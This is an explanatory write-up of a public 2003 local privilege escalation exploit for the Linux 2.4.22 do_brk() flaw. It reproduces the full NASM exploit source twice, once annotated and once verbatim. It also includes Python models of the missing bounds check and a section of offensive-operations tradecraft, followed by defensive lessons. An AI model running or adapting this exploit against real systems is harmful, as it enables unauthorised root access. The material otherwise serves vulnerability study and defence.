Linux Kernel 2.4.22 'do_brk()' Local Privilege Escalation Explained

What this paper is
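This paper describes a local privilege escalation vulnerability in Linux kernel 2.4.22 and earlier 2.4 releases (CVE-2003-0961, fixed in 2.4.23). The flaw is in do_brk(), the internal kernel function behind the brk() system call, which changes the size of a program's data segment (heap). do_brk() did not verify that the requested range stays below the top of user address space, so a local user can make the kernel create a memory mapping that extends into kernel address space. The code provided is a small, self-contained ELF executable written in NASM assembly that triggers this condition; it is meant to be run by an unprivileged local user.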
Simple technical breakdown
The core of the vulnerability is how the kernel handles requests to move the program break. Normally, brk() is used by programs to grow or shrink the heap, and sys_brk() hands the actual mapping work to do_brk(). On i386 with the default 3 GB/1 GB split, user space ends at TASK_SIZE (0xC0000000). In affected kernels do_brk() did not check that the end of the new range (addr + len) stays below that limit, so a process could obtain a virtual memory area (VMA) that covers kernel addresses.
The exploit uses a high virtual address as the base of its break. Because the image is loaded at 0xBFFF0000, the break starts just below TASK_SIZE, and moving it to 0xC0500000 is a request for only about 5 MB. According to the authors' comments, this is what gets the request past the check in sys_brk() against available memory. Once the process owns a VMA spanning kernel addresses, the kernel treats that range as ordinary process memory, which is the basis for corrupting kernel state and escalating privileges.
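The missing range check can be modeled in a few lines. The following Python sketch is an illustration, not kernel code: TASK_SIZE assumes the i386 3 GB/1 GB split, the helper name brk_range_ok is hypothetical, the starting break 0xBFFF1000 is an assumption (image end rounded up to a page), and the "patched" condition is a paraphrase of the kind of bounds check added in 2.4.23.

```python
PAGE_SIZE = 0x1000
TASK_SIZE = 0xC0000000   # assumption: i386 with the default 3 GB/1 GB split
U32 = 0xFFFFFFFF         # mask used to emulate 32-bit unsigned arithmetic


def page_align(n):
    """Round n up to the next page boundary (32-bit)."""
    return (n + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1) & U32


def brk_range_ok(addr, length, patched):
    """Simplified model of range validation for a do_brk()-style request.

    Hypothetical helper: only the upper-bound check is modeled, every
    other check the kernel performs is left out.
    """
    length = page_align(length)
    if length == 0:
        return True
    if not patched:
        # Affected kernels did not compare the end of the range to TASK_SIZE.
        return True
    end = (addr + length) & U32
    # Reject ranges that cross TASK_SIZE or wrap around the address space.
    return not (end > TASK_SIZE or end < addr)


old_brk = 0xBFFF1000     # assumption: break right after the one-page image
new_brk = 0xC0500000     # value passed to brk() in the listing
request = new_brk - old_brk

print(hex(request), brk_range_ok(old_brk, request, patched=False),
      brk_range_ok(old_brk, request, patched=True))
```

With the bound in place the request from the listing is refused, while an ordinary heap growth well below TASK_SIZE is still accepted.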
The exploit also relocates its stack so that it does not sit in the way of the break expansion, and it calls mlockall(MCL_FUTURE), which the original comments mark as being "for tests as root". Neither step is about avoiding detection.
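The stack relocation relies on simple page arithmetic: round the stack pointer down to find the page to move, then re-apply the in-page offset to the new base. A minimal Python sketch of that arithmetic follows; the sample stack pointer and the relocated base are hypothetical values chosen for illustration, not addresses taken from a real run.

```python
PAGE_SIZE = 0x1000


def page_base(addr):
    """Start of the page containing addr (what 'and ebx, ~(0x1000 - 1)' computes)."""
    return addr & ~(PAGE_SIZE - 1)


def relocate_sp(esp, new_base):
    """Same offset inside the moved page (what 'and esp, 0xFFF; add esp, eax' computes)."""
    return new_base + (esp & (PAGE_SIZE - 1))


esp = 0xBFFFFE40         # hypothetical stack pointer at program entry
new_base = 0x40000000    # hypothetical address returned by mremap

print(hex(page_base(esp)), hex(relocate_sp(esp, new_base)))
```

Only the stack pointer is adjusted this way; pointers stored on the stack still refer to the old location, which is why the authors note that environ and cmdline are no longer available.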
Complete code and payload walkthrough
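The provided code is NASM assembly for 32-bit (i386) Linux. It uses org and a hand-written ELF header, so it is assembled as a flat binary (for example with nasm -f bin) and the output is directly a runnable ELF executable; no linker or separate loader is involved. The listing below is the original code with expanded comments.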
; E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/131/
;
; Christophe Devine (devine at cr0.net) and Julien Tinnes (julien at cr0.org)
;
; This exploit uses sys_brk directly to expand his break and doesn't rely
; on the ELF loader to do it.
;
; To bypass a check in sys_brk against available memory, we use a high
; virtual address as base address
;
; In most case (let's say when no PaX w/ ASLR :) we have to move the stack
; so that we can expand our break
;
BITS 32
org 0xBFFF0000 ; Load address of the image: 16 pages below TASK_SIZE (0xC0000000),
; in the region where the stack normally lives.
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 1, 1 ; e_ident: Magic bytes for ELF file.
times 9 db 0 ; Padding.
dw 2 ; e_type: ET_EXEC (Executable).
dw 3 ; e_machine: EM_386 (Intel 80386).
dd 1 ; e_version: EV_CURRENT.
dd _start ; e_entry: Entry point address.
dd phdr - $$ ; e_phoff: Offset to program header table.
dd 0 ; e_shoff: Offset to section header table (not used here).
dd 0 ; e_flags: Processor-specific flags.
dw ehdrsize ; e_ehsize: ELF header size.
dw phdrsize ; e_phentsize: Size of each program header entry.
dw 2 ; e_phnum: Number of program header entries. Only one entry is defined
; below, so the second one overlaps the code at _start.
dw 0 ; e_shentsize: Size of each section header entry (not used).
dw 0 ; e_shnum: Number of section header entries (not used).
dw 0 ; e_shstrndx: Section header string table index (not used).
ehdrsize equ $ - ehdr ; Calculates the size of the ELF header.
phdr: ; Elf32_Phdr
dd 1 ; p_type: PT_LOAD (Loadable segment).
dd 0 ; p_offset: File offset (0 for this segment).
dd $$ ; p_vaddr: Virtual address of the segment ($$ is the section start, 0xBFFF0000).
dd $$ ; p_paddr: Physical address (not used on Linux; set equal to p_vaddr).
dd filesize ; p_filesz: Size in file.
dd filesize ; p_memsz: Size in memory.
dd 7 ; p_flags: PF_R | PF_W | PF_X (Read, Write, Execute).
dd 0x1000 ; p_align: Alignment (1 page).
phdrsize equ $ - phdr ; Calculates the size of the program header.
_start: ; Entry point of the program.
; ** Make sure the stack is not above us
mov eax, 163 ; System call number for mremap(old_addr, old_size, new_size, flags).
mov ebx, esp ; old_addr: start from the current stack pointer...
and ebx, ~(0x1000 - 1) ; ...rounded down to the start of its page.
mov ecx, 0x1000 ; old_size: one page (the code assumes the stack is one page only).
mov edx, 0x9000 ; new_size: nine pages. Per the original comment, this size is chosen
; so that the stack cannot get mapped after the image.
mov esi,1 ; flags: MREMAP_MAYMOVE, the kernel may relocate the mapping.
int 0x80 ; Execute mremap; eax receives the new base address.
; The stack page now lives at a new address, so esp must follow it.
and esp, (0x1000 - 1) ; Keep only the offset of esp within its page.
add esp, eax ; Add the new base: esp points at the same offset in the moved page.
; nb: we don't fix
; pointers so environ/cmdline
; are not available
; (Pointers into the old stack are not updated, so the environment and
; command-line arguments are no longer reachable.)
mov eax,152 ; System call number for mlockall (original comment: "for tests as root").
mov ebx,2 ; Flag MCL_FUTURE: lock all mappings created from now on.
int 0x80 ; Execute mlockall. On 2.4 kernels locking memory requires CAP_IPC_LOCK,
; so an unprivileged caller is expected to get an error, which is ignored.
; get VMAs for the kernel memory
mov eax,45 ; System call number for brk.
mov ebx,0xC0500000 ; Requested new break: 0x500000 bytes above TASK_SIZE (0xC0000000),
; that is, inside kernel address space.
int 0x80 ; Execute brk. This is the core of the exploit: on a vulnerable kernel
; do_brk() creates a VMA that extends past the end of user space.
; The call itself does not write to kernel memory.
mov ecx, 4 ; Loop counter for forking.
loop0:
mov eax, 2 ; System call number for fork.
int 0x80 ; Execute fork. Parent and child both continue the loop with the
; same ecx, so four iterations leave up to 16 processes, each
; with a copy of the address space that includes the
; out-of-range VMA. The source does not state why it forks.
loop loop0 ; Decrement ecx and loop if not zero.
_idle:
mov eax,162 ; System call number for nanosleep.
mov ebx,timespec ; Pointer to the requested interval (ecx, the "remaining time"
; pointer, is 0 after the loop above).
int 0x80 ; Execute nanosleep system call. This puts the process to sleep.
jmp _idle ; Infinite loop, keeping the process alive.
timespec dd 10,0 ; Structure for nanosleep: 10 seconds, 0 nanoseconds.
filesize equ $ - $$ ; Calculates the total size of the file image.
; milw0rm.com [2003-12-02]
Mapping of code fragments to practical purpose:
- org 0xBFFF0000: Sets the load address of the image just below TASK_SIZE (0xC0000000), so the program break starts close to kernel address space.
- ELF Header (ehdr): A minimal hand-written Elf32_Ehdr, so the assembler output can be executed directly.
- Program Header (phdr): Defines a single loadable segment with read, write, and execute permissions.
- _start: The entry point of the program.
- mov eax, 163; mov ebx, esp; and ebx, ~(0x1000 - 1); mov ecx, 0x1000; mov edx, 0x9000; mov esi, 1; int 0x80: Calls mremap() on the page containing esp, with old size 0x1000, new size 0x9000, and the MREMAP_MAYMOVE flag. Note that 0x9000 is the new size, not a destination address; the kernel chooses where the enlarged mapping goes. Per the original comments, the goal is to make sure the stack is not above the image, where it would block the break expansion.
- and esp, (0x1000 - 1); add esp, eax: Adjusts the stack pointer after mremap. eax holds the new base address returned by mremap, and the in-page offset of esp is preserved, so esp points at the same data in the relocated page.
- mov eax, 152; mov ebx, 2; int 0x80: Executes mlockall(MCL_FUTURE), which locks mappings created from then on into RAM. The original comment marks this as "for tests as root"; for an unprivileged user the call is expected to fail and the result is ignored.
- mov eax, 45; mov ebx, 0xC0500000; int 0x80: This is the critical part. It calls brk(0xC0500000). On a vulnerable kernel do_brk() accepts the request and creates a VMA reaching 0x500000 bytes into kernel address space.
- mov ecx, 4; loop0: mov eax, 2; int 0x80; loop loop0: Executes fork() in a four-iteration loop. Because every child continues the loop, this leaves up to 16 processes, each with a copy of the modified address space. The source does not document the purpose.
- _idle: mov eax, 162; mov ebx, timespec; int 0x80; jmp _idle: Puts each process into an endless nanosleep loop, which keeps the processes and their mappings alive.
- timespec dd 10,0: Defines the timespec structure for nanosleep, specifying a sleep duration of 10 seconds.
- filesize equ $ - $$: Calculates the total size of the file image, used for p_filesz and p_memsz.
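The header sizes and the entry address follow directly from the field widths in the listing. The Python sketch below rebuilds the same Elf32_Ehdr with the standard struct module to make the layout concrete; the constant and function names are illustrative, and only the header is reproduced, not the program.

```python
import struct

BASE = 0xBFFF0000                      # value of 'org' in the listing
EHDR_FMT = "<16sHHIIIIIHHHHHH"         # Elf32_Ehdr, little-endian, no padding
PHDR_FMT = "<8I"                       # Elf32_Phdr: eight 32-bit fields

EHDR_SIZE = struct.calcsize(EHDR_FMT)  # 'ehdrsize' in the listing
PHDR_SIZE = struct.calcsize(PHDR_FMT)  # 'phdrsize' in the listing
ENTRY = BASE + EHDR_SIZE + PHDR_SIZE   # '_start' directly follows both headers


def build_ehdr():
    """Pack the ELF header with the same field values as the listing."""
    e_ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
    return struct.pack(
        EHDR_FMT,
        e_ident,
        2,          # e_type: ET_EXEC
        3,          # e_machine: EM_386
        1,          # e_version
        ENTRY,      # e_entry
        EHDR_SIZE,  # e_phoff: program headers start right after the ELF header
        0, 0,       # e_shoff, e_flags
        EHDR_SIZE,  # e_ehsize
        PHDR_SIZE,  # e_phentsize
        2,          # e_phnum, as written in the listing
        0, 0, 0,    # e_shentsize, e_shnum, e_shstrndx
    )


def parse_ehdr(data):
    """Unpack an Elf32_Ehdr and return a few fields of interest."""
    f = struct.unpack(EHDR_FMT, data[:EHDR_SIZE])
    return {"e_type": f[1], "e_machine": f[2], "e_entry": f[4],
            "e_phoff": f[5], "e_phnum": f[10]}


hdr = build_ehdr()
print(len(hdr), PHDR_SIZE, hex(parse_ehdr(hdr)["e_entry"]))
```

The ELF header is 52 bytes and the program header 32 bytes, so execution starts 84 bytes into the file, at 0xBFFF0054.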
Practical details for offensive operations teams
- Required Access Level: Local user access to a vulnerable Linux system. No elevated privileges are initially required.
- Lab Preconditions:
  - An i386 Linux system running kernel 2.4.22 or an earlier unpatched 2.4 release. This is a very old kernel and unlikely to be found on modern systems.
  - The NASM assembler to build the listing.
  - Permission to run a binary on the test system. The output is a standalone ELF executable, so no separate injection method is needed.
- Tooling Assumptions:
  - NASM (Netwide Assembler) for assembling the code.
  - No C compiler or loader stub is required, because the ELF header is part of the listing.
  - Kernel debugging tools, or a virtual machine with snapshots, are useful for understanding the exploit's behavior in a lab environment.
- Execution Pitfalls:
  - Kernel Version Specificity: The flaw affects kernels up to 2.4.22 and was fixed in 2.4.23. Vendor kernels with a backported fix are not affected even if they report an older version number.
  - Memory Layout Variations: The code hard-codes several assumptions: a 3 GB/1 GB address split, a stack that fits in one page, and a free load address at 0xBFFF0000. If any of these does not hold, the code may fail.
  - Security Mitigations: The authors' comments mention "no PaX w/ ASLR" as the case in which the stack has to be moved. With a randomized or otherwise hardened layout the assumptions above may not apply.
  - No Payload: The listing stops after creating the mapping and forking. It does not by itself spawn a root shell; the E-DB note at the top points to an updated exploit.
  - System Stability: Creating process mappings over kernel addresses can crash or corrupt the running kernel, so the test machine should be treated as disposable.
  - Target Address Stability: The target address 0xC0500000 is hard-coded. What the kernel keeps in the range below it depends on the kernel configuration and system state.
- Tradecraft Considerations:
  - Stealth: The code leaves up to 16 sleeping processes behind, which are visible in the process list, and host-based intrusion detection systems (HIDS) may flag the unusual system call pattern.
  - Payload Delivery: The binary has to be placed on the target and executed by a local user. This often involves chaining with another vulnerability or exploiting a misconfiguration.
  - Post-Exploitation: The nanosleep loop only keeps the processes alive. It is not a persistence mechanism, and the listing contains no post-exploitation logic.
Where this was used and when
This code was published on 2003-12-02. It targets the do_brk() flaw in Linux kernel 2.4.22 and earlier, which was fixed in 2.4.23. The flaw itself was used in the wild: the Debian project attributed the November 2003 compromise of several of its servers to it. Public reports of this particular code being used are scarce. It represents a class of missing bounds checks in kernel memory management that was more common in older kernels, before later hardening work.
Defensive lessons for modern teams
- Kernel Patching is Paramount: The most crucial defense is to keep the operating system and kernel up to date with security patches. This flaw was closed by a small bounds check in 2.4.23.
- Understand Memory Management: While direct exploitation of brk() is less common now, understanding how the kernel manages virtual memory and heap allocations is vital for analyzing potential memory corruption vulnerabilities.
- Mitigation Features: Modern kernels incorporate defenses like Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP/NX bit), and hardening patch sets such as PaX go further. These raise the bar for local privilege escalation, but they do not replace the fix for a missing bounds check.
- Principle of Least Privilege: Ensure that applications and users run with the minimum privileges necessary. This limits the impact of a successful compromise.
- Intrusion Detection: Host-based Intrusion Detection Systems (HIDS) can detect unusual system call patterns or unexpected binaries being executed.
- System Call Auditing: Monitoring critical system calls like brk, mremap, and fork can help identify suspicious activity, for example a brk() request for an address above the user-space limit.
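As a rough aid for the patching point above, a kernel release string can be compared against the first fixed mainline release. The Python sketch below is an assumption-laden illustration: the function names are hypothetical, it only reasons about the 2.4 series, and it cannot see vendor backports, so a True result means "check the vendor changelog", not "confirmed vulnerable".

```python
import re

FIXED_IN = (2, 4, 23)   # first mainline 2.4 release containing the do_brk() check


def parse_release(release):
    """Extract (major, minor, patch) from a release string such as '2.4.22-1.2115'."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", release)
    if not m:
        return None
    return tuple(int(part) for part in m.groups())


def predates_do_brk_fix(release):
    """True/False for 2.4 kernels, None when this sketch makes no claim."""
    version = parse_release(release)
    if version is None or version[:2] != (2, 4):
        return None
    return version < FIXED_IN


for sample in ("2.4.22", "2.4.23", "2.4.20-8smp", "5.15.0-91-generic"):
    print(sample, predates_do_brk_fix(sample))
```

On a live system the string would typically come from platform.release() or uname -r.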
ASCII visual
This exploit manipulates memory mappings and the stack. A simplified view of the address space before and after the brk() call, assuming i386 with the 3 GB/1 GB split (addresses not to scale):
Before the brk() call (Simplified):
+-------------------+ 0xFFFFFFFF  <-- High Memory Addresses
|                   |
|   Kernel Space    |
|                   |
+-------------------+ 0xC0000000  (TASK_SIZE)
|  (unmapped gap)   |
+-------------------+ ~0xBFFF1000 <-- initial break
|   Program image   |
+-------------------+ 0xBFFF0000
|                   |
|    User Space     |
| (relocated stack) |
|                   |
+-------------------+ 0x00000000  <-- Low Memory Addresses
After the exploit's brk(0xC0500000) (Conceptual):
+-------------------+ 0xFFFFFFFF  <-- High Memory Addresses
|   Kernel Space    |
+- - - - - - - - - -+ 0xC0500000  <-- new break
|  Kernel addresses | <-- now also covered by a VMA
|  inside heap VMA  |     that belongs to the process
+-------------------+ 0xC0000000  (TASK_SIZE)
|     Heap VMA      |
+-------------------+ ~0xBFFF1000
|   Program image   |
+-------------------+ 0xBFFF0000
|                   |
|    User Space     |
| (relocated stack) |
|                   |
+-------------------+ 0x00000000  <-- Low Memory Addresses
Explanation: The image is loaded just below the top of user space, and the exploit first moves its stack out of the way with mremap(). It then calls brk() with a target address (0xC0500000) that lies inside kernel address space. A vulnerable do_brk() does not reject the request and extends the heap VMA across TASK_SIZE, so the kernel now regards part of its own address range as memory of the user process. This is the condition that makes corruption of kernel data, and thus privilege escalation, possible.
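To put numbers on the picture, the requested break range can be split at the user/kernel boundary. This Python sketch assumes TASK_SIZE is 0xC0000000 and that the initial break sits at 0xBFFF1000 (the one-page image rounded up); both values are assumptions for illustration, and the helper name is hypothetical.

```python
PAGE_SIZE = 0x1000
TASK_SIZE = 0xC0000000   # assumption: i386 3 GB/1 GB split


def split_at_task_size(start, end):
    """Return (bytes below TASK_SIZE, bytes at or above TASK_SIZE) for [start, end)."""
    user = max(0, min(end, TASK_SIZE) - start)
    kernel = max(0, end - max(start, TASK_SIZE))
    return user, kernel


old_brk = 0xBFFF1000     # assumption: break right after the one-page image
new_brk = 0xC0500000     # value passed to brk() in the listing

user_bytes, kernel_bytes = split_at_task_size(old_brk, new_brk)
print(user_bytes // PAGE_SIZE, "user pages,", kernel_bytes // PAGE_SIZE, "kernel pages")
```

Under these assumptions only 15 pages of the new range are legitimate user addresses; the remaining 1280 pages (5 MiB) lie above TASK_SIZE.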
Source references
- PAPER ID: 129
- PAPER TITLE: Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (1)
- AUTHOR: Christophe Devine
- PUBLISHED: 2003-12-02
- KEYWORDS: Linux,local
- PAPER URL: https://www.exploit-db.com/papers/129
- RAW URL: https://www.exploit-db.com/raw/129
Original Exploit-DB Content (Verbatim)
; E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/131/
;
; Christophe Devine (devine at cr0.net) and Julien Tinnes (julien at cr0.org)
;
; This exploit uses sys_brk directly to expand his break and doesn't rely
; on the ELF loader to do it.
;
; To bypass a check in sys_brk against available memory, we use a high
; virtual address as base address
;
; In most case (let's say when no PaX w/ ASLR :) we have to move the stack
; so that we can expand our break
;
BITS 32
org 0xBFFF0000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 1, 1 ; e_ident
times 9 db 0
dw 2 ; e_type
dw 3 ; e_machine
dd 1 ; e_version
dd _start ; e_entry
dd phdr - $$ ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 2 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type
dd 0 ; p_offset
dd $$ ; p_vaddr
dd $$ ; p_paddr
dd filesize ; p_filesz
dd filesize ; p_memsz
dd 7 ; p_flags
dd 0x1000 ; p_align
phdrsize equ $ - phdr
_start:
; ** Make sure the stack is not above us
mov eax, 163 ; mremap
mov ebx, esp
and ebx, ~(0x1000 - 1) ; align to page size
mov ecx, 0x1000 ; we suppose stack is one page only
mov edx, 0x9000 ; be sure it can't get mapped after
; us
mov esi,1 ; MREMAP_MAYMOVE
int 0x80
and esp, (0x1000 - 1) ; offset in page
add esp, eax ; stack ptr to new location
; nb: we don't fix
; pointers so environ/cmdline
; are not available
mov eax,152 ; mlockall (for tests as root)
mov ebx,2 ; MCL_FUTURE
int 0x80
; get VMAs for the kernel memory
mov eax,45 ; brk
mov ebx,0xC0500000
int 0x80
mov ecx, 4
loop0:
mov eax, 2 ; fork
int 0x80
loop loop0
_idle:
mov eax,162 ; nanosleep
mov ebx,timespec
int 0x80
jmp _idle
timespec dd 10,0
filesize equ $ - $$
; milw0rm.com [2003-12-02]